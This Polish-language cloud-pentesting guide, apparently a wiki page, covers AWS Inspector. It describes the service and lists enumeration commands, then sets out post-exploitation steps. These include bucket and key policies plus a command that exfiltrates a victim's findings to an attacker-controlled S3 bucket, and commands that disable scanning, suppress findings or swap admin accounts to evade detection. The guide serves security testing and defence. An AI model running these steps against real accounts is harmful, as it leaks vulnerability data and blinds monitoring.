AWS - Inspector Enum

AWS - Inspector Enum

Inspector

Amazon Inspector to zaawansowana, zautomatyzowana usługa zarządzania podatnościami, zaprojektowana w celu zwiększenia bezpieczeństwa środowiska AWS. Usługa ta ciągle skanuje instancje Amazon EC2, obrazy kontenerów w Amazon ECR, usługi Amazon ECS i funkcje AWS Lambda w poszukiwaniu podatności i niezamierzonego wystawienia sieci. Korzystając z rozbudowanej bazy danych inteligencji podatności, Amazon Inspector dostarcza szczegółowe wyniki, w tym poziomy powagi i zalecenia dotyczące naprawy, pomagając organizacjom wczesnym identyfikować i rozwiązywać ryzyka związane z bezpieczeństwem. To kompleksowe podejście zapewnia umocnioną postawę bezpieczeństwa w różnych usługach AWS, wspierając zgodność i zarządzanie ryzykiem.

Kluczowe elementy

Wyniki

Wyniki w Amazon Inspector to szczegółowe raporty dotyczące podatności i wystawień odkrytych podczas skanowania instancji EC2, repozytoriów ECR lub funkcji Lambda. W zależności od swojego stanu, wyniki są kategoryzowane jako:

• Aktywne: Wynik nie został naprawiony.

• Zamknięte: Wynik został naprawiony.

• Wyciszony: Wynik został oznaczony tym stanem z powodu jednej lub więcej reguł wyciszenia.

Wyniki są również kategoryzowane w następujące trzy typy:

• Pakiet: Te wyniki dotyczą podatności w pakietach oprogramowania zainstalowanych na Twoich zasobach. Przykłady to przestarzałe biblioteki lub zależności znanymi problemami z bezpieczeństwem.

• Kod: Ta kategoria obejmuje podatności znalezione w kodzie aplikacji działających na Twoich zasobach AWS. Powszechne problemy to błędy kodowania lub niebezpieczne praktyki, które mogą prowadzić do naruszeń bezpieczeństwa.

• Sieć: Wyniki sieciowe identyfikują potencjalne wystawienia w konfiguracjach sieciowych, które mogą być wykorzystane przez atakujących. Obejmują one otwarte porty, niebezpieczne protokoły sieciowe i źle skonfigurowane grupy zabezpieczeń.

Filtry i Reguły Wyciszenia

Filtry i reguły wyciszenia w Amazon Inspector pomagają zarządzać i priorytetyzować wyniki. Filtry pozwalają na precyzowanie wyników na podstawie określonych kryteriów, takich jak powaga lub typ zasobu. Reguły wyciszenia pozwalają wyciszyć pewne wyniki uważane za niskie ryzyko, które zostały już zażegnane lub z innych ważnych powodów, zapobiegając przeładowaniu raportów zabezpieczeń i umożliwiając skupienie się na bardziej krytycznych problemach.

Lista Materiałów Oprogramowania (SBOM)

Lista Materiałów Oprogramowania (SBOM) w Amazon Inspector to eksportowalna zagnieżdżona lista inwentaryzacyjna, która szczegółowo opisuje wszystkie składniki w pakiecie oprogramowania, w tym biblioteki i zależności. SBOMy pomagają zapewnić przejrzystość łańcucha dostaw oprogramowania, umożliwiając lepsze zarządzanie podatnościami i zgodność. Są one kluczowe dla identyfikowania i łagodzenia ryzyka związanego z oprogramowaniem open source i firm trzecich.

Kluczowe funkcje

Eksportowanie wyników

Amazon Inspector oferuje możliwość eksportowania wyników do kubełków Amazon S3, Amazon EventBridge i AWS Security Hub, co umożliwia generowanie szczegółowych raportów zidentyfikowanych podatności i wystawień do dalszej analizy lub udostępniania w określonym terminie. Ta funkcja obsługuje różne formaty wyjściowe, takie jak CSV i JSON, ułatwiając integrację z innymi narzędziami i systemami. Funkcjonalność eksportu pozwala na dostosowanie danych zawartych w raportach, umożliwiając filtrowanie wyników na podstawie określonych kryteriów, takich jak powaga, typ zasobu lub zakres daty, i domyślnie uwzględniając wszystkie wyniki w bieżącym regionie AWS z aktywnym statusem.

Podczas eksportowania wyników konieczny jest klucz usługi zarządzania kluczami (KMS) do szyfrowania danych podczas eksportu. Klucze KMS zapewniają, że eksportowane wyniki są chronione przed nieautoryzowanym dostępem, zapewniając dodatkową warstwę bezpieczeństwa dla wrażliwych informacji o podatnościach.

Skanowanie instancji Amazon EC2

Amazon Inspector oferuje rozbudowane możliwości skanowania instancji Amazon EC2 w celu wykrywania podatności i problemów związanych z bezpieczeństwem. Inspector porównuje wyodrębnione metadane z instancji EC2 z regułami z zaleceniami bezpieczeństwa, aby wykryć podatności pakietów i problemy z dostępnością sieci. Skany te można przeprowadzać za pomocą metod opartych na agencie lub bez agencji, w zależności od konfiguracji ustawień trybu skanowania Twojego konta.

• Oparte na Agencie: Wykorzystuje agenta AWS Systems Manager (SSM) do przeprowadzania dogłębnych skanów. Ta metoda umożliwia kompleksowe zbieranie danych i analizę bezpośrednio z instancji.

• Bez Agencji: Zapewnia lekką alternatywę, która nie wymaga instalowania agenta na instancji, tworząc migawkę EBS każdego woluminu instancji EC2, szukając podatności, a następnie usuwając ją; wykorzystując istniejącą infrastrukturę AWS do skanowania.

Tryb skanowania określa, która metoda zostanie użyta do przeprowadzenia skanów EC2:

• Oparte na Agencie: Wymaga zainstalowania agenta SSM na instancjach EC2 w celu przeprowadzenia dogłębnej inspekcji.

• Skanowanie Hybrydowe: Łączy obie metody, oparte na agencie i bez agencji, w celu maksymalizacji pokrycia i minimalizacji wpływu na wydajność. W instancjach EC2, gdzie zainstalowany jest agent SSM, Inspector przeprowadzi skan oparty na agencie, a dla tych, gdzie nie ma agenta SSM, przeprowadzony skan będzie bez agencji.

Inną istotną funkcją jest dogłębna inspekcja instancji EC2 z systemem Linux. Ta funkcja oferuje szczegółową analizę oprogramowania i konfiguracji instancji EC2 z systemem Linux, zapewniając szczegółowe oceny podatności, w tym podatności systemu operacyjnego, podatności aplikacji i błędne konfiguracje, zapewniając kompleksową ocenę bezpieczeństwa. Osiąga się to poprzez inspekcję niestandardowych ścieżek i wszystkich ich podkatalogów. Domyślnie Amazon Inspector przeskanuje następujące, ale każde konto członkowskie może zdefiniować do 5 dodatkowych niestandardowych ścieżek, a każdy administrator delegowany do 10:

• /usr/lib

• /usr/lib64

• /usr/local/lib

• /usr/local/lib64

Skanowanie obrazów kontenerów Amazon ECR

Amazon Inspector zapewnia rozbudowane możliwości skanowania obrazów kontenerów w Amazon Elastic Container Registry (ECR), zapewniając wykrywanie i efektywne zarządzanie podatnościami pakietów.

• Podstawowe Skanowanie: To szybki i lekki skan, który identyfikuje znane podatności pakietów systemu operacyjnego w obrazach kontenerów za pomocą standardowego zestawu reguł z projektu open-source Clair. W tej konfiguracji skanowania Twoje repozytoria będą skanowane podczas przesyłania lub wykonywania skanów ręcznych.

• Rozszerzone Skanowanie: Ta opcja dodaje funkcję ciągłego skanowania oprócz skanowania podczas przesyłania. Rozszerzone skanowanie zagłębia się w warstwy każdego obrazu kontenera, aby zidentyfikować podatności w pakietach systemu operacyjnego i pakietach języków programowania z większą dokładnością. Analizuje zarówno obraz bazowy, jak i dodatkowe warstwy, zapewniając kompleksowy obraz potencjalnych problemów z bezpieczeństwem.

Skanowanie funkcji Lambda Amazon

Amazon Inspector obejmuje kompleksowe możliwości skanowania funkcji AWS Lambda i jej warstw, zapewniając bezpieczeństwo i integralność aplikacji bezserwerowych. Inspector oferuje dwa rodzaje skanowania dla funkcji Lambda:

• Standardowe skanowanie Lambda: Ta domyślna funkcja identyfikuje podatności oprogramowania w zależnościach pakietów aplikacji dodanych do Twojej funkcji Lambda i warstw. Na przykład, jeśli Twoja funkcja używa wersji biblioteki takiej jak python-jwt z znaną podatnością, generuje wynik.

• Skanowanie kodu Lambda: Analizuje niestandardowy kod aplikacji pod kątem problemów związanych z bezpieczeństwem, wykrywając podatności takie jak luki wstrzykiwania, wycieki danych, słabe szyfrowanie i brak szyfrowania. Zbiera fragmenty kodu podkreślające wykryte podatności, takie jak zahardcodowane poświadczenia. Wyniki obejmują szczegółowe sugestie naprawy i fragmenty kodu do naprawy problemów.

Skanowania Center for Internet Security (CIS)

Amazon Inspector zawiera skanowania CIS do porównywania systemów operacyjnych instancji Amazon EC2 z zaleceniami najlepszych praktyk od Center for Internet Security (CIS). Te skanowania zapewniają, że konfiguracje spełniają standardowe podstawy bezpieczeństwa branżowego.

• Konfiguracja: Skanowania CIS oceniają, czy konfiguracje systemu spełniają konkretne zalecenia CIS Benchmark, przy czym każde sprawdzenie jest powiązane z identyfikatorem i tytułem sprawdzenia CIS.

• Wykonanie: Skanowania są wykonywane lub zaplanowane na podstawie tagów instancji i zdefiniowanych harmonogramów.

• Wyniki: Wyniki po skanowaniu wskazują, które sprawdzenia zostały zaliczone, pominięte lub niezaliczone, dostarczając wglądu w postawę bezpieczeństwa każdej instancji.

Wyliczenie

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Eksploatacja

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Atakujący mógłby generować szczegółowe raporty dotyczące podatności lub listy materiałów oprogramowania (SBOMs) i wyciekać je z Twojego środowiska AWS. Te informacje mogą być wykorzystane do zidentyfikowania konkretnych słabych punktów, przestarzałego oprogramowania lub niebezpiecznych zależności, umożliwiając ukierunkowane ataki.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Poniższy przykład pokazuje, jak eksfiltrować wszystkie aktywne wyniki z Amazon Inspector do kontrolowanego przez atakującego kubełka Amazon S3 z kontrolowanym przez atakującego kluczem Amazon KMS:

1. Utwórz kubełek Amazon S3 i dołącz do niego politykę umożliwiającą dostęp z Amazon Inspector ofiary:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}

2. Utwórz klucz Amazon KMS i dołącz do niego politykę, aby mógł być używany przez Amazon Inspector ofiary:

{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}

3. Wykonaj polecenie utworzenia raportu z wynikami i wyciek danych:

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• Potencjalny wpływ: Generowanie i wyciek szczegółowych raportów dotyczących podatności i oprogramowania, uzyskiwanie wglądu w konkretne podatności i słabości związane z bezpieczeństwem.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Atakujący mógłby anulować generowanie określonego raportu z wynikami lub raportu SBOM, uniemożliwiając zespołom ds. bezpieczeństwa otrzymywanie aktualnych informacji o podatnościach i zestawach materiałów do budowy oprogramowania (SBOM), opóźniając wykrywanie i usuwanie problemów związanych z bezpieczeństwem.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• Potencjalny wpływ: Zakłócenie monitorowania bezpieczeństwa i uniemożliwienie terminowego wykrywania oraz usuwania problemów związanych z bezpieczeństwem.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Atakujący posiadający te uprawnienia będzie mógł manipulować regułami filtrowania, które określają, które podatności i problemy związane z bezpieczeństwem są raportowane lub tłumione (jeśli działanie jest ustawione na SUPPRESS, zostanie utworzona reguła tłumienia). Może to ukryć krytyczne podatności przed administratorami bezpieczeństwa, ułatwiając wykorzystanie tych słabości bez wykrycia. Poprzez zmianę lub usunięcie ważnych filtrów, atakujący może również generować szum poprzez zalewanie systemu nieistotnymi wynikami, co utrudnia skuteczne monitorowanie bezpieczeństwa i reakcję.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• Potencjalny wpływ: Ukrycie lub tłumienie istotnych podatności lub zalewanie systemu nieistotnymi wynikami.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Atakujący mógłby znacząco zakłócić strukturę zarządzania bezpieczeństwem.

• Wyłączenie konta admina delegowanego przez atakującego mogłoby uniemożliwić zespołowi bezpieczeństwa dostęp i zarządzanie ustawieniami oraz raportami Amazon Inspector.

• Włączenie nieautoryzowanego konta admina umożliwiłoby atakującemu kontrolę konfiguracji bezpieczeństwa, potencjalnie wyłączając skanowania lub modyfikując ustawienia w celu ukrycia złośliwych działań.

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• Potencjalny wpływ: Zakłócenie zarządzania bezpieczeństwem.

inspector2:AssociateMember, inspector2:DisassociateMember

Atakujący mógłby manipulować powiązaniami kont członkowskich w organizacji Amazon Inspector. Poprzez powiązywanie nieautoryzowanych kont lub odłączanie prawidłowych, atakujący mógłby kontrolować, które konta są uwzględniane w skanowaniu bezpieczeństwa i raportowaniu. Może to prowadzić do wykluczenia istotnych kont z monitorowania bezpieczeństwa, umożliwiając atakującemu wykorzystanie podatności w tych kontach bez wykrycia.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• Potencjalne skutki: Wyłączenie kluczowych kont z skanów bezpieczeństwa, umożliwiając niezauważone wykorzystanie podatności.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Atakujący posiadający uprawnienia inspector2:Disable mógłby wyłączyć skanowanie bezpieczeństwa określonych typów zasobów (EC2, ECR, Lambda, kod Lambda) w określonych kontach, pozostawiając części środowiska AWS bez monitorowania i podatne na ataki. Ponadto, posiadając uprawnienia inspector2:Enable & iam:CreateServiceLinkedRole, atakujący mógłby ponownie włączyć skany selektywnie, aby uniknąć wykrycia podejrzanych konfiguracji.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• Potencjalny wpływ: Utworzenie martwych punktów w monitorowaniu bezpieczeństwa.

inspector2:UpdateOrganizationConfiguration

Atakujący posiadający to uprawnienie będzie mógł aktualizować konfiguracje dla Twojej organizacji Amazon Inspector, wpływając na domyślne funkcje skanowania włączone dla nowych kont członkowskich.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• Potencjalny wpływ: Zmiana polityk i konfiguracji skanowania bezpieczeństwa dla organizacji.

inspector2:TagResource, inspector2:UntagResource

Atakujący mógłby manipulować tagami zasobów AWS Inspector, które są kluczowe dla organizacji, śledzenia i automatyzacji ocen bezpieczeństwa. Poprzez zmianę lub usunięcie tagów, atakujący mógłby potencjalnie ukryć podatności przed skanowaniem bezpieczeństwa, zakłócić raportowanie zgodności i zakłócić procesy automatycznego usuwania usterek, co prowadziłoby do niesprawdzonych problemów z bezpieczeństwem i naruszonej integralności systemu.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• Potencjalny wpływ: Ukrywanie podatności, zakłócenie raportowania zgodności, zakłócenie automatyzacji bezpieczeństwa i zakłócenie alokacji kosztów.

Odnośniki

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html